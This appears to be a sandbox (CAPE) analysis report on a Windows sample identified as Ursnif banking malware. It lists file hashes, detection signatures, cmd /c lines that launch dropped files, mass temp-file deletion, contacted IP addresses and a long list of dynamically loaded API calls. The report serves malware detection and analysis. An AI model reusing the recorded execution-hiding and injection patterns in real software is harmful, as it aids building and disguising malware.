2020-03-24 09:50:32,125 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-03-24 09:50:32,125 [root] WARNING: File at path "C:\gGNnZRIY\debugger" does not exist, skip.
2020-03-24 09:50:32,125 [root] INFO: Analysis completed.

MalScore

10.0

Ursnif

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2020-03-24 09:47:01 2020-03-24 09:50:44

File Details

File Name ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
SHA512 40f2880784f086494f19109aa0ca196fe4d0b5764ee17da8d2227582693ea9097b9e977faa1e62288b6bc0f56f813672150915b018b14a21b7014df3a9aaee6a
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
TrID
  • 38.4% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 26.3% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 11.8% (.EXE) OS/2 Executable (generic) (2029/13)
  • 11.6% (.EXE) Generic Win/DOS Executable (2002/3)
  • 11.6% (.EXE) DOS Executable Generic (2000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched
Resubmit sample

Signatures

Behavioural detection: Executable code extraction
SetUnhandledExceptionFilter detected (possible anti-debug)
Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution
command: cmd /c ""C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
command: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\KMHJVI~1.EXE""
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 0 trigged the Yara rule 'embedded_win_api'
Hit: PID 3064 trigged the Yara rule 'vmdetect'
Hit: PID 2980 trigged the Yara rule 'shellcode_patterns'
Hit: PID 2980 trigged the Yara rule 'Ursnif'
Possible date expiration check, exits too soon after checking local time
process: KmHJvidHgRX.exe, PID 3064
Anomalous file deletion behavior detected (10+)
DeletedFile: C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
DeletedFile: C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab859A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar859B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA509.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA50A.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\CabA77B.tmp
DeletedFile: C:\Users\user\AppData\Local\Temp\TarA77C.tmp
Attempts to connect to a dead IP:Port (5 unique times)
IP: 192.229.232.240:80 (United States)
IP: 185.85.0.29:443 (Germany)
IP: 192.42.116.41:80 (Netherlands)
IP: 185.85.0.29:80 (Germany)
IP: 23.202.161.73:80 (United States)
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: ADVAPI32.dll/SaferIdentifyLevel
DynamicLoader: ADVAPI32.dll/SaferComputeTokenFromLevel
DynamicLoader: ADVAPI32.dll/SaferCloseLevel
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/WriteProcessMemory
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: ntdll.dll/NtQueryVirtualMemory
DynamicLoader: SHLWAPI.dll/PathFindExtensionW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindExtensionA
DynamicLoader: SHLWAPI.dll/StrRChrA
DynamicLoader: SHLWAPI.dll/StrChrA
DynamicLoader: SHLWAPI.dll/StrStrIA
DynamicLoader: SHLWAPI.dll/StrTrimW
DynamicLoader: SHLWAPI.dll/StrChrW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathCombineW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyA
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsA
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/GetCommandLineW
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/GetVersion
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/GetTempFileNameA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/GetLongPathNameW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/SetEndOfFile
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: USER32.dll/SendMessageW
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: USER32.dll/SetWindowLongW
DynamicLoader: USER32.dll/SetClassLongW
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: USER32.dll/GetAncestor
DynamicLoader: USER32.dll/GetWindowLongW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: USER32.dll/GetForegroundWindow
DynamicLoader: USER32.dll/TranslateMessage
DynamicLoader: USER32.dll/GetMessageW
DynamicLoader: USER32.dll/keybd_event
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/wsprintfW
DynamicLoader: USER32.dll/wsprintfA
DynamicLoader: USER32.dll/DispatchMessageW
DynamicLoader: USER32.dll/GetCursorInfo
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/RegDeleteValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExA
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyA
DynamicLoader: ADVAPI32.dll/RegCreateKeyA
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorA
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegSetValueExA
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: SHELL32.dll/
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: SHELL32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: USER32.dll/FindWindowA
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: kernel32.dll/Wow64EnableWow64FsRedirection
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64ReadVirtualMemory64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: ntdll.dll/ZwWow64QueryInformationProcess64
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationToken
DynamicLoader: ntdll.dll/ZwOpenProcess
DynamicLoader: ntdll.dll/ZwClose
DynamicLoader: ntdll.dll/ZwOpenProcessToken
DynamicLoader: ntdll.dll/strcpy
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/NtResumeProcess
DynamicLoader: ntdll.dll/RtlNtStatusToDosError
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtSuspendProcess
DynamicLoader: ntdll.dll/memcpy
DynamicLoader: ntdll.dll/NtMapViewOfSection
DynamicLoader: ntdll.dll/_snprintf
DynamicLoader: ntdll.dll/_wcsupr
DynamicLoader: ntdll.dll/_strupr
DynamicLoader: ntdll.dll/memmove
DynamicLoader: ntdll.dll/wcscpy
DynamicLoader: ntdll.dll/memset
DynamicLoader: ntdll.dll/ZwQueryKey
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlUpcaseUnicodeString
DynamicLoader: ntdll.dll/wcstombs
DynamicLoader: ntdll.dll/RtlImageNtHeader
DynamicLoader: ntdll.dll/RtlAdjustPrivilege
DynamicLoader: ntdll.dll/mbstowcs
DynamicLoader: ntdll.dll/NtUnmapViewOfSection
DynamicLoader: ntdll.dll/NtCreateSection
DynamicLoader: ntdll.dll/sprintf
DynamicLoader: ntdll.dll/wcscat
DynamicLoader: ntdll.dll/__C_specific_handler
DynamicLoader: ntdll.dll/__chkstk
DynamicLoader: kernel32.dll/lstrcpynA
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/TerminateThread
DynamicLoader: kernel32.dll/LoadLibraryW
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/VirtualProtectEx
DynamicLoader: kernel32.dll/FileTimeToLocalFileTime
DynamicLoader: kernel32.dll/QueueUserWorkItem
DynamicLoader: kernel32.dll/SystemTimeToFileTime
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/FindNextFileA
DynamicLoader: kernel32.dll/FindFirstFileA
DynamicLoader: kernel32.dll/CompareFileTime
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsA
DynamicLoader: kernel32.dll/GetModuleFileNameA
DynamicLoader: kernel32.dll/GetLocalTime
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/lstrlenA
DynamicLoader: kernel32.dll/HeapAlloc
DynamicLoader: kernel32.dll/HeapFree
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/lstrcatA
DynamicLoader: kernel32.dll/CreateDirectoryA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/RemoveDirectoryA
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/lstrcpyA
DynamicLoader: kernel32.dll/HeapReAlloc
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/HeapDestroy
DynamicLoader: kernel32.dll/HeapCreate
DynamicLoader: kernel32.dll/SetWaitableTimer
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/GetCurrentThread
DynamicLoader: kernel32.dll/GetSystemTimeAsFileTime
DynamicLoader: kernel32.dll/GetWindowsDirectoryA
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateEventA
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcmpiW
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/lstrcatW
DynamicLoader: kernel32.dll/GetCurrentThreadId
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetTempPathA
DynamicLoader: kernel32.dll/SuspendThread
DynamicLoader: kernel32.dll/ResumeThread
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/lstrcmpA
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/SetLastError
DynamicLoader: kernel32.dll/lstrcmpiA
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: kernel32.dll/OpenWaitableTimerA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/WaitForMultipleObjects
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/CreateWaitableTimerA
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/UnregisterWait
DynamicLoader: kernel32.dll/TlsGetValue
DynamicLoader: kernel32.dll/LoadLibraryExW
DynamicLoader: kernel32.dll/TlsSetValue
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/RegisterWaitForSingleObject
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/TlsAlloc
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/CreateFileMappingA
DynamicLoader: kernel32.dll/OpenFileMappingA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/QueueUserAPC
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/CallNamedPipeA
DynamicLoader: kernel32.dll/WaitNamedPipeA
DynamicLoader: kernel32.dll/ConnectNamedPipe
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetOverlappedResult
DynamicLoader: kernel32.dll/DisconnectNamedPipe
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CreateNamedPipeA
DynamicLoader: kernel32.dll/CancelIo
DynamicLoader: kernel32.dll/GetSystemTime
DynamicLoader: kernel32.dll/RemoveVectoredExceptionHandler
DynamicLoader: kernel32.dll/SleepEx
DynamicLoader: kernel32.dll/AddVectoredExceptionHandler
DynamicLoader: kernel32.dll/OpenEventA
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/FreeLibrary
DynamicLoader: kernel32.dll/RaiseException
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/FileTimeToSystemTime
DynamicLoader: kernel32.dll/VirtualFree
